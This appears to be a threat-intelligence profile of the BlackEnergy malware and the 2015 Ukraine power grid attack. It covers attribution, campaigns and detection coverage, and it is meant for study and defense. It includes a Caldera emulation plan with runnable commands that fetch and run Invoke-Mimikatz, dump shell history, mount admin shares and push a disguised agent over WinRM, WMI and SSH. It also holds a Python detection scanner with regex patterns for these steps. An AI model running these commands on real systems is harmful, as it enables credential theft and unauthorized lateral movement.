Threat Actor

BlackEnergy

blackenergy · russia_apt_sandworm · active since 2007

BlackEnergy (canonical malware naming with generational variants: BlackEnergy 1, the ~2007 DDoS underground tool; BlackEnergy 2, the ~2010-2013 HMI-targeting industrial process capability; BlackEnergy 3, the modular plugin architecture used in the 2015 Ukraine power grid attack; and KillDisk, the signature wiper companion deployed for restoration-delay amplification) is Sandworm Team's (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard, curated separately as the sandworm_team parent operator) signature pre-Industroyer ICS-targeting malware platform. It is the platform behind the first publicly acknowledged successful cyberattack on a power grid, the December 23, 2015 Ukraine attack against three energy distribution companies (Prykarpattyaoblenergo most affected, with 30 substations switched off including 7×110 kV + 23×35 kV, ~230,000 customers without electricity for 1-6 hours in freezing temperatures, and up to 73 MWh not supplied; Chernivtsioblenergo + Kyivoblenergo were also affected).

Standalone malware platform cluster paralleling industroyer + notpetya + olympic_destroyer in the Sandworm-platform-family cell.

Canonical attribution chain: iSIGHT Partners' October 2014 Sandworm Team naming disclosure (Frank Hatheway + John Hultquist + Stephen Ward; Dune-novel references in the BlackEnergy malware codebase; CVE-2014-4114 Windows INF/PowerPoint zero-day exploitation targeting Ukrainian government + EU/NATO officials); Mandiant's BlackEnergy 3 "calling card" assessment; US Deputy Energy Secretary Elizabeth Sherwood-Randall's February 2016 first public US attribution to Russia; the Ukrainian government's February 2017 formal attribution; and the US DOJ's October 15, 2020 indictment of 6 GRU Unit 74455 officers (Yuriy Sergeyevich Andrienko et al. per the MITRE ATT&CK Campaign C0028 reference).

The canonical SANS/E-ISAC analysis of March 18, 2016, "Analysis of the Cyber Attack on the Ukrainian Power Grid: Defense Use Case" by Robert M. Lee + Michael J. Assante + Tim Conway, established the Stage 1 access tool (BlackEnergy 3 Office macro spear-phishing) + Stage 2 restoration-delay amplifier (KillDisk wiper) framework, with the critical clarification "Neither BlackEnergy 3, unreported backdoors, KillDisk, nor the malicious firmware uploads alone were responsible for the outage. Each was simply a component of the cyber attack". The actual outage was caused by direct adversary interaction with ICS control systems via stolen VPN credentials: RDP-driven circuit breaker manipulation ("the keyboard and mouse of their PCs started moving without human interaction" per Security Boulevard) over a ~10-minute attack window. Signature tradecraft includes 6+ months of pre-positioning reconnaissance via Office macro spear-phishing (an employee opened an Excel attachment in spring 2015 per ISA Lessons Learned), corporate VPN abuse for the IT-to-OT pivot, a direct interactive RDP session for circuit breaker manipulation, KillDisk Stage 2 restoration-delay tradecraft (MBR corruption + overwrite of Windows HMIs in RTUs), serial-to-Ethernet gateway firmware corruption with random code (substation device destruction), UPS scheduled disconnect via the remote management interface (control center recovery interference), and telephone denial-of-service against customer call centers (customer recovery interference); also linked to the October 2014 Ukrainian elections destructive malware per Mandiant.

TeleBots backdoor framework adjacency: the signature ESET-disclosed code link to the subsequent Industroyer + NotPetya Sandworm-platform-family clusters.

Signature pattern: multi-generational platform evolution from criminal DDoS tool to nation-state ICS-targeting modular framework.

Canonical industry baseline reference for the "first publicly acknowledged successful cyberattack on a power grid", cited in essentially all subsequent ICS-targeting cyber-operation industry analyses through the 2014-2026 period; Andy Greenberg's "Sandworm" book (2019) is the canonical chronicle.

The cluster fills the generational predecessor position in the Sandworm-platform-family chronology: BlackEnergy 2015 - Industroyer 2016 - NotPetya 2017 - Industroyer2 2022.

russia_apt_sandworm · confidence: high · 18 aliases

Profile

BlackEnergy (canonical malware naming with generational variants: BlackEnergy 1, the ~2007 DDoS underground tool; BlackEnergy 2, HMI targeting; BlackEnergy 3, the modular plugin architecture used in the 2015 Ukraine power grid attack; and KillDisk, the signature wiper companion) is Sandworm Team's signature pre-Industroyer ICS-targeting malware platform, behind the first publicly acknowledged successful cyberattack on a power grid, the December 23, 2015 Ukraine attack that caused 230,000 consumers to lose electricity for 1-6 hours. Standalone malware platform cluster paralleling industroyer + notpetya + olympic_destroyer in the Sandworm-platform-family cell, distinct from the sandworm_team parent operator cluster.

Multi-generational platform evolution
  • BlackEnergy 1 (~2007): DDoS underground criminal tool.
  • BlackEnergy 2 (2010-2013): HMI-targeting industrial process capability.
  • BlackEnergy 3 (2014+): modular plugin architecture + Sandworm signature calling card.
Attribution chain
  • iSIGHT Partners October 2014 canonical Sandworm Team naming (Dune-novel references in code) + CVE-2014-4114 Windows INF/PowerPoint zero-day disclosure.
  • Mandiant: BlackEnergy 3 as Sandworm calling card.
  • US Deputy Energy Secretary February 2016 attribution.
  • Ukrainian government February 2017 attribution.
  • US DOJ October 15, 2020 indictment of 6 GRU Unit 74455 officers.
2015 Ukraine power grid attack architecture (per SANS/E-ISAC canonical Defense Use Case)
  • 6+ months pre-positioning reconnaissance via BlackEnergy 3 Office macro spear-phishing (employee Excel attachment opened spring 2015).
  • December 23, 2015 attack execution: three oblenergos in parallel (Prykarpattyaoblenergo + Chernivtsioblenergo + Kyivoblenergo), 30 substations switched off via RDP-driven circuit breaker manipulation ("the keyboard and mouse of their PCs started moving without human interaction" per Security Boulevard); attack lasted ~10 minutes.
  • Restoration-delay amplifiers: KillDisk wiped Windows systems + HMIs (MBR corruption); serial-to-Ethernet gateway firmware corrupted with random code; UPS scheduled disconnect at control centers; telephone DoS against customer call centers.
Critical SANS/E-ISAC clarification: the actual outage was caused by direct adversary interaction with ICS control systems; BlackEnergy 3 was the Stage 1 access tool and KillDisk the Stage 2 restoration-delay amplifier, not the direct outage cause.
Signature operational tradecraft
  • Multi-generational platform with Sandworm "calling card" status (BE3 signature).
  • Office macro spear-phishing delivery (signature Microsoft Word + Excel attachments with macros).
  • Corporate VPN abuse for IT-to-OT pivot.
  • Direct interactive RDP session for circuit breaker manipulation (signature operator-blame pattern adjacent to Stuxnet operator-display manipulation).
  • KillDisk Stage 2 restoration-delay tradecraft (MBR corruption + HMI overwrite).
  • Serial-to-Ethernet gateway firmware corruption (substation device destruction with random code).
  • UPS scheduled disconnect via remote management interface (control center recovery interference).
  • Telephone DoS against customer call centers (customer recovery interference).
  • CVE-2014-4114 INF/PowerPoint zero-day (iSIGHT October 2014 canonical disclosure).
  • TeleBots backdoor framework adjacent (signature ESET-disclosed code link to Industroyer + NotPetya).
The cluster fills the generational predecessor position in the Sandworm-platform-family chronology: BlackEnergy 2015 - Industroyer 2016 - NotPetya 2017 - Industroyer2 2022.

Aliases

18 aliases: blackenergy, black energy, blackenergy_2, blackenergy2, blackenergy_3, blackenergy3, be2, be3, blackenergy_apt, blackenergy_malware, blackenergy lite, killdisk, killdisk_wiper, killdisk malware, blackenergy ukraine power grid 2015, first power grid cyberattack 2015, blackenergy 3 sandworm calling card, blackenergy spearphishing office macro

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'
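The executor commands above are exactly the kind of activity a purple team should expect to surface in PowerShell script-block logs (Event ID 4104) while running this profile. The following is an added example, not part of the threatengine.sh page and not Caldera's own code: a small Python scanner that runs a handful of regex rules over constructed script-block records and reports which steps of the plan they would catch. The log records, the rule names, the severities and the ATT&CK mappings on each rule are the example's own assumptions.

```python
"""Pattern-based triage of PowerShell script-block log text.

Added example for detection engineering around the emulation plan above.
The sample records below are constructed, not real telemetry, and the rule
set is an illustration, not a vendor ruleset.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str   # ATT&CK ID; mapping is this example's assumption
    severity: str
    pattern: re.Pattern


def _rx(pattern: str) -> re.Pattern:
    # Script blocks are multi-line and case-insensitive in practice.
    return re.compile(pattern, re.I | re.S)


RULES = (
    # DownloadString(...) followed later in the block by iex / Invoke-Expression
    Rule("ps_download_cradle", "T1059.001", "high",
         _rx(r"DownloadString\s*\(.*?\).*?(?:\biex\b|Invoke-Expression)")),
    # Overriding certificate validation before fetching remote content
    Rule("tls_validation_bypass", "T1562.001", "medium",
         _rx(r"ServerCertificateValidationCallback\s*=")),
    Rule("mimikatz_invocation", "T1003.001", "critical",
         _rx(r"Invoke-Mimikatz|-DumpCreds\b")),
    # net use \\host\C$ /user:... (admin share mount with explicit credentials)
    Rule("admin_share_mount_with_creds", "T1021.002", "medium",
         _rx(r"\bnet\s+use\s+\\\\\S+\\[A-Za-z]\$.*?/user:")),
    Rule("wmic_remote_process_create", "T1047", "high",
         _rx(r"\bwmic\b.*?/node:.*?process\s+call\s+create")),
    # Copy-Item ... C:\Users\Public\... -ToSession (WinRM file transfer)
    Rule("winrm_file_transfer_to_public", "T1570", "medium",
         _rx(r"Copy-Item\b.*?Users\\Public\\.*?-ToSession")),
)


def scan_script_blocks(blocks):
    """blocks: iterable of (record_id, script_text).

    Returns one finding dict per (record, rule) pair whose pattern matches.
    """
    findings = []
    for record_id, text in blocks:
        for rule in RULES:
            if rule.pattern.search(text):
                findings.append({"record": record_id, "rule": rule.name,
                                 "technique": rule.technique,
                                 "severity": rule.severity})
    return findings


def summarize(findings):
    """Count findings per severity, e.g. {'critical': 1, 'high': 2, ...}."""
    return dict(Counter(f["severity"] for f in findings))


# Constructed sample records (hostnames, paths and the password are placeholders).
SAMPLE_BLOCKS = [
    ("4104-0001", "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"),
    ("4104-0002",
     "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n"
     "$web = (New-Object System.Net.WebClient);\n"
     "$result = $web.DownloadString(\"https://example.invalid/Invoke-Mimikatz.ps1\");\n"
     "iex $result; Invoke-Mimikatz -DumpCreds"),
    ("4104-0003",
     "net use \\\\host01.corp.example\\C$ /user:CORP\\svc_backup PLACEHOLDER-PASSWORD"),
    ("4104-0004",
     "$node = '''host01.corp.example''';\n"
     "wmic /node:$node /user:$user /password:$password process call create "
     "\"powershell.exe C:\\Users\\Public\\s4ndc4t.exe\""),
    ("4104-0005",
     "$session = New-PSSession -ComputerName host01 -Credential $cred;\n"
     "Copy-Item C:\\tools\\agent.exe -Destination \"C:\\Users\\Public\\svchost.exe\" "
     "-ToSession $session;"),
]


if __name__ == "__main__":
    results = scan_script_blocks(SAMPLE_BLOCKS)
    for f in results:
        print(f"{f['record']}  {f['severity']:8}  {f['technique']:10}  {f['rule']}")
    print("by severity:", summarize(results))
```

Rules like the admin-share mount and the WinRM copy also fire on legitimate administration, which is why they carry a lower severity than the download cradle or the credential-dumping call; in a real pipeline the record should be joined with the user, host and time of day before it becomes an alert.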

Notable Campaigns

9 campaigns
2016-2017 · US + Ukrainian Government Attribution (February 2016 / February 2017)
2016 · SANS / E-ISAC Canonical Analysis (March 18, 2016)
2015 · BlackEnergy 3 Pre-positioning Reconnaissance (Spring-Summer 2015)
2015 · 2015 Ukraine Power Grid Attack (December 23, 2015)
2014-2026 · Continued Industry Reference Status (2014-2026)
2014 · iSIGHT Sandworm Team Canonical Naming + CVE-2014-4114 (October 2014)
2014 · Ukrainian Elections Destructive Malware (October 2014)
2010-2013 · BlackEnergy 2, Human-Machine Interface Targeting
2007-2010 · BlackEnergy Origin (~2007), DDoS Underground Tool

Attribution & Reporting

Attributed by
iSIGHT Partners (canonical October 2014 Sandworm Team naming disclosure, Frank Hatheway + John Hultquist + Stephen Ward)
Mandiant / Google Cloud Threat Intelligence Group (canonical Sandworm + BlackEnergy 3 calling card analysis)
ESET WeLiveSecurity (canonical BlackEnergy + KillDisk technical analysis, Anton Cherepanov + Robert Lipovsky)
SANS Industrial Control Systems (canonical March 18 2016 Ukraine power grid attack analysis)
Electricity Information Sharing and Analysis Center E-ISAC (canonical SANS-collaborative analysis)
CISA / ICS-CERT (canonical IR-ALERT-H-16-056-01 government technical analysis)
Dragos (Robert M. Lee, canonical ELECTRUM threat group analysis)
Trend Micro (Sandworm to Blacken, SCADA Connection October 16 2014)
McAfee Labs (Raj Samani + Christiaan Beek, Updated BlackEnergy Trojan Grows More Powerful January 14 2016)
Booz Allen Hamilton (When The Lights Went Out 2016 canonical incident analysis)
Andy Greenberg (WIRED, How an Entire Nation Became Russia's Test Lab for Cyberwar June 28 2017 + canonical Sandworm book)
Symantec (BlackEnergy 3 + KillDisk verification)
CrowdStrike (Voodoo Bear canonical Sandworm tracking)
Microsoft Threat Intelligence Center (Seashell Blizzard / Iridium canonical Sandworm tracking)
Secureworks (Iron Viking canonical Sandworm tracking)
US Department of Justice (October 15 2020 indictment of 6 GRU Unit 74455 officers per Scott W. Brady)
US Deputy Energy Secretary Elizabeth Sherwood-Randall (February 2016 first public US attribution)
CERT-UA Ukrainian Computer Emergency Response Team
MITRE ATT&CK Campaign C0028 (2015 Ukraine Electric Power Attack)
Key reporting
iSIGHT Partners (Frank Hatheway + John Hultquist + Stephen Ward): Sandworm Team canonical naming disclosure + CVE-2014-4114 (October 2014)
Mandiant / Google Cloud: Sandworm Team and the Ukrainian Power Authority Attacks, canonical BlackEnergy 3 calling card analysis
SANS Industrial Control Systems + E-ISAC (Robert M. Lee + Michael J. Assante + Tim Conway): Analysis of the Cyber Attack on the Ukrainian Power Grid, Defense Use Case (March 18, 2016), canonical Stage 1/Stage 2 framework
CISA / ICS-CERT: IR-ALERT-H-16-056-01 Cyber-Attack Against Ukrainian Critical Infrastructure, canonical US government technical analysis
ESET WeLiveSecurity (Anton Cherepanov + Robert Lipovsky): BlackEnergy + KillDisk technical analysis
Trend Micro: Sandworm to Blacken, The SCADA Connection (October 16, 2014)
McAfee Labs (Raj Samani + Christiaan Beek): Updated BlackEnergy Trojan Grows More Powerful (January 14, 2016)
Booz Allen Hamilton: When The Lights Went Out (2016), canonical incident analysis
Andy Greenberg (WIRED): How an Entire Nation Became Russia's Test Lab for Cyberwar (June 28, 2017) + canonical Sandworm book (2019)
Symantec: BlackEnergy 3 + KillDisk verification analysis
MITRE ATT&CK Campaign C0028: 2015 Ukraine Electric Power Attack
MITRE ATT&CK Software S0089: BlackEnergy
MITRE ATT&CK Software S0166: KillDisk
US Department of Justice (Scott W. Brady): October 15, 2020 indictment of 6 GRU Unit 74455 officers, United States vs. Yuriy Sergeyevich Andrienko et al.
Malpedia Software Profile: BlackEnergy

Operational

State sponsor

Russian state-sponsored APT, specifically Sandworm Team (GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / Dragos ELECTRUM / Secureworks Iron Viking / CrowdStrike Voodoo Bear, curated separately as the sandworm_team parent operator cluster). Attribution chain: (1) iSIGHT Partners October 2014 canonical Sandworm Team naming disclosure: per the Mandiant/Google Cloud blog retrospective + Henry Jackson School analysis, iSIGHT Partners published the canonical Sandworm Team naming in October 2014 based on Dune-novel references in the BlackEnergy malware codebase. The disclosure included CVE-2014-4114 INF/PowerPoint zero-day exploitation targeting Ukrainian government officials + EU/NATO + industrial control systems reconnaissance.

(2) BlackEnergy 3 as Sandworm "calling card": per Mandiant: "we have linked Sandworm Team to the incident, principally based on BlackEnergy 3, the malware that has become their calling card." BlackEnergy 3 represents Sandworm's signature ICS-targeting modular platform capability. (3) US Deputy Energy Secretary February 2016 attribution: per Henry Jackson School: "In February 2016, U.S. Deputy Energy Secretary Elizabeth Sherwood-Randall attributed the first attack on the Ukrainian grid to Russia at a meeting with U.S. energy industry executives." First public US government attribution to Russia for the 2015 Ukraine power grid attack.

(4) SANS/E-ISAC March 18, 2016 canonical attack analysis: SANS Industrial Control Systems + Electricity Information Sharing and Analysis Center published the canonical "Analysis of the Cyber Attack on the Ukrainian Power Grid: Defense Use Case", which operationally established the canonical BlackEnergy 3 + KillDisk Stage 1/Stage 2 attack architecture analysis. (5) Ukrainian government February 2017 formal attribution: Ukrainian officials made a formal attribution to Russian security services and Sandworm per Henry Jackson School analysis. (6) US Department of Justice October 15, 2020 indictment: 6 GRU Unit 74455 officers indicted, including for the Ukraine power grid attacks (Yuriy Sergeyevich Andrienko et al. per the MITRE ATT&CK Campaign C0028 reference).

Operational target profile: 2015 Ukraine power grid attack (December 23, 2015): three Ukrainian energy distribution companies (oblenergos)
  • Prykarpattyaoblenergo (Ivano-Frankivsk Oblast): most affected, 30 substations switched off (7× 110 kV + 23× 35 kV), 230,000 people without electricity for 1-6 hours.
  • Chernivtsioblenergo: also affected.
  • Kyivoblenergo: also affected.
Per CISA/ICS-CERT IR-ALERT-H-16-056-01 + SANS/E-ISAC canonical analysis: BlackEnergy 3 was used as the initial access vector via spear-phishing emails with malicious Microsoft Office (Word + Excel) attachments containing macros. After 6+ months of reconnaissance, attackers seized SCADA control, remotely switched 30 substations off, and deployed KillDisk to wipe Windows systems; serial-to-Ethernet gateway firmware was corrupted, UPS disabled, and a telephone DoS run against call centers. Up to 73 MWh of electricity not supplied (~0.015% of daily Ukraine consumption) per Wikipedia. Critical SANS/E-ISAC clarification: "Neither BlackEnergy 3, unreported backdoors, KillDisk, nor the malicious firmware uploads alone were responsible for the outage. Each was simply a component of the cyber attack for the purposes of access and delay of restoration." The actual outage was caused by direct adversary interaction with ICS control systems; BlackEnergy 3 = Stage 1 access tool, KillDisk = Stage 2 restoration-delay amplifier.
Multi-generational platform context (per Trend Micro + McAfee + Henry Jackson School):
  • BlackEnergy 1 (~2007): original DDoS attack tool used in the underground criminal market.
  • BlackEnergy 2: tailored for human-machine interfaces controlling industrial processes.
  • BlackEnergy 3: modular plugin architecture, more general capability, signature ICS reconnaissance + Sandworm "calling card".
Per CERT-UA: BlackEnergy 3 is also linked to the Ukrainian elections destructive malware of October 2014 and to Ukrainian media + regional power authority targeting throughout 2015. The operational pattern indicates a broader BlackEnergy 3 access campaign across Ukraine in 2015, with the December 2015 power grid attack as the culminating operation. The cluster represents Sandworm's pre-Industroyer signature ICS-targeting platform capability, operationally a generational predecessor in the Sandworm-platform-family chronology (BlackEnergy 2015 - Industroyer 2016 - NotPetya 2017 - Industroyer2 2022).
Motivations
first_publicly_acknowledged_successful_cyberattack_on_power_grid_capability, ukrainian_power_grid_disruption_during_russia_ukraine_conflict, sandworm_signature_ics_targeting_malware_platform_calling_card, multi_generational_platform_evolution_ddos_to_ics_targeting, ukrainian_critical_infrastructure_pre_positioning_reconnaissance, russian_strategic_objective_post_crimea_annexation_ukrainian_energy_disruption, restoration_delay_via_killdisk_wiper_and_telephone_dos_tradecraft

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma): 41/60 · 68%
Analytics (MITRE CAR): 26/60 · 43%
Runtime / container (Falco): 5/60 · 8%
File / malware (YARA): 0/60 · 0%
Network (Suricata/Snort): 10/60 · 16%
Vuln scan (Nuclei): 0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use.

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
Master boot record corruption (KillDisk); Microsoft Office Word/Excel macro spearphishing attachments; Sandworm signature ICS-targeting platform, pre-Industroyer; serial-to-Ethernet device firmware corruption with random code; stolen VPN credentials for ICS network pivot

CVEs Exploited

2 CVEs
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin